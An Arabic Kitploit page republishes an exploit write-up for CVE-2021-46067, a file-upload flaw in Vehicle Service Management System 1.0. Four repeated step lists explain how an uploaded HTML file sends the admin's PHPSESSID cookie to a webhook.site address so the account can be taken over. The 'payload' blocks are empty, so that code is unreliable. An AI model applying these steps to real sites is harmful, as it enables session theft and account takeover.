Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-46067 — CVE-2021-46067 - في نظام إدارة خدمة المركبات الإصدار 1.0 يمكن للمهاجم سرقة ملفات تعريف الارتباط مما يؤدي إلى الاستيلاء الكامل على الحساب. | Kitploit
أدوات/GitHubGitHub/sanupl/cve-2021-46067
أدوات التصيدالاستغلالأدوات انتحال الشخصيةاستغلال تطبيقات الويبالهندسة الاجتماعيةالمصادقة
GitHubsanupl/cve-2021-46067

CVE-2021-46067

CVE-2021-46067 - في نظام إدارة خدمة المركبات الإصدار 1.0 يمكن للمهاجم سرقة ملفات تعريف الارتباط مما يؤدي إلى الاستيلاء الكامل على الحساب.

عرض المستودع
16منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-46067

عنوان الاستغلال: نظام إدارة خدمات المركبات - 'متعدد' سرقة الكوكيز تؤدي إلى الاستيلاء الكامل على الحساب

مؤلف الاستغلال: SANU P.L

CVE: CVE-2021-46067

CVSS: 9.8 حرج

المراجع:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46067
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46067

الوصف:

في نظام إدارة خدمات المركبات الإصدار 1.0، يمكن للمهاجم سرقة الكوكيز مما يؤدي إلى الاستيلاء الكامل على الحساب.

1. نظام إدارة خدمات المركبات - 'حسابي' (/admin/?page=user)

الاستغلال:

  1. تسجيل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. الانتقال إلى قسم حسابي http://localhost/vehicle_service/admin/?page=user
  3. إنشاء رابط Webhook - https://webhook.site
  4. نسخ رابط Webhook الفريد ولصقه في كود HTML أدناه.

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>سرقة الكوكيز</title>
<body>

</body>
</html>
  1. حفظ كود HTML أعلاه باسم مثل: Cookie Stealing.html
  2. في قسم حسابي، أدخل جميع التفاصيل المطلوبة واختر ملف HTML في حقل الصورة الرمزية.
  3. انقر على زر التحديث.
  4. افتح الصورة الرمزية في علامة تبويب جديدة وتحقق من حالة Webhook.
  5. حصلنا على الطلب الذي يحتوي على PHPSESSID.
  6. انسخ قيمة PHPSESSID وافتح متصفحًا آخر.
  7. زر لوحة الإدارة http://localhost/vehicle_service/admin
  8. تحقق من قيم الكوكيز وقم بتغيير قيمة PHPSESSID إلى القيمة المنسوخة.
  9. الآن قم بالوصول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  10. تم تسجيل الدخول بنجاح إلى الحساب. الاستيلاء على الحساب ناجح.

2. نظام إدارة خدمات المركبات - 'قائمة المستخدمين' (/admin/?page=user/manage_user)

الاستغلال:

  1. تسجيل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. الانتقال إلى قسم قائمة المستخدمين والنقر على زر إنشاء جديد.
  3. إنشاء رابط Webhook - https://webhook.site
  4. نسخ رابط Webhook الفريد ولصقه في كود HTML أدناه.

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>سرقة الكوكيز</title>
<body>

</body>
</html>
  1. حفظ كود HTML أعلاه باسم مثل: Cookie Stealing.html
  2. في قسم إنشاء مستخدم جديد، أدخل جميع التفاصيل المطلوبة واختر ملف HTML في حقل الصورة الرمزية.
  3. انقر على زر حفظ.
  4. افتح الصورة الرمزية في علامة تبويب جديدة وتحقق من حالة Webhook.
  5. حصلنا على الطلب الذي يحتوي على PHPSESSID.
  6. انسخ قيمة PHPSESSID وافتح متصفحًا آخر.
  7. زر لوحة الإدارة http://localhost/vehicle_service/admin
  8. تحقق من قيم الكوكيز وقم بتغيير قيمة PHPSESSID إلى القيمة المنسوخة.
  9. الآن قم بالوصول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  10. تم تسجيل الدخول بنجاح إلى الحساب. الاستيلاء على الحساب ناجح.

3. نظام إدارة خدمات المركبات - 'الإعدادات - شعار النظام' (/admin/?page=system_info)

الاستغلال:

  1. تسجيل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. الانتقال إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info
  3. إنشاء رابط Webhook - https://webhook.site
  4. نسخ رابط Webhook الفريد ولصقه في كود HTML أدناه.

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>سرقة الكوكيز</title>
<body>

</body>
</html>
  1. حفظ كود HTML أعلاه باسم مثل: Cookie Stealing.html
  2. في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة واختر ملف HTML في حقل شعار النظام.
  3. انقر على زر التحديث.
  4. افتح صورة شعار النظام في علامة تبويب جديدة وتحقق من حالة Webhook.
  5. حصلنا على الطلب الذي يحتوي على PHPSESSID.
  6. انسخ قيمة PHPSESSID وافتح متصفحًا آخر.
  7. زر لوحة الإدارة http://localhost/vehicle_service/admin
  8. تحقق من قيم الكوكيز وقم بتغيير قيمة PHPSESSID إلى القيمة المنسوخة.
  9. الآن قم بالوصول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  10. تم تسجيل الدخول بنجاح إلى الحساب. الاستيلاء على الحساب ناجح.

4. نظام إدارة خدمات المركبات - 'الإعدادات - غلاف الموقع' (/admin/?page=system_info)

الاستغلال:

  1. تسجيل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. الانتقال إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info
  3. إنشاء رابط Webhook - https://webhook.site
  4. نسخ رابط Webhook الفريد ولصقه في كود HTML أدناه.

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>سرقة الكوكيز</title>
<body>

</body>
</html>
  1. حفظ كود HTML أعلاه باسم مثل: Cookie Stealing.html
  2. في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة واختر ملف HTML في حقل غلاف الموقع.
  3. انقر على زر التحديث.
  4. افتح صورة غلاف الموقع في علامة تبويب جديدة وتحقق من حالة Webhook.
  5. حصلنا على الطلب الذي يحتوي على PHPSESSID.
  6. انسخ قيمة PHPSESSID وافتح متصفحًا آخر.
  7. زر لوحة الإدارة http://localhost/vehicle_service/admin
  8. تحقق من قيم الكوكيز وقم بتغيير قيمة PHPSESSID إلى القيمة المنسوخة.
  9. الآن قم بالوصول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  10. تم تسجيل الدخول بنجاح إلى الحساب. الاستيلاء على الحساب ناجح.

التأثير:

يقوم المهاجم برفع ملف HTML ضار يؤدي إلى إعادة التوجيه إلى موقع طرف ثالث، ويتم كشف الكوكيز في الطلب. يؤدي ذلك إلى الاستيلاء الكامل على الحساب.

التخفيف:

يوصى بالتحقق من وظيفة رفع الملفات وإجراء فحوصات ثانوية في الجلسة.

تنزيل الأداة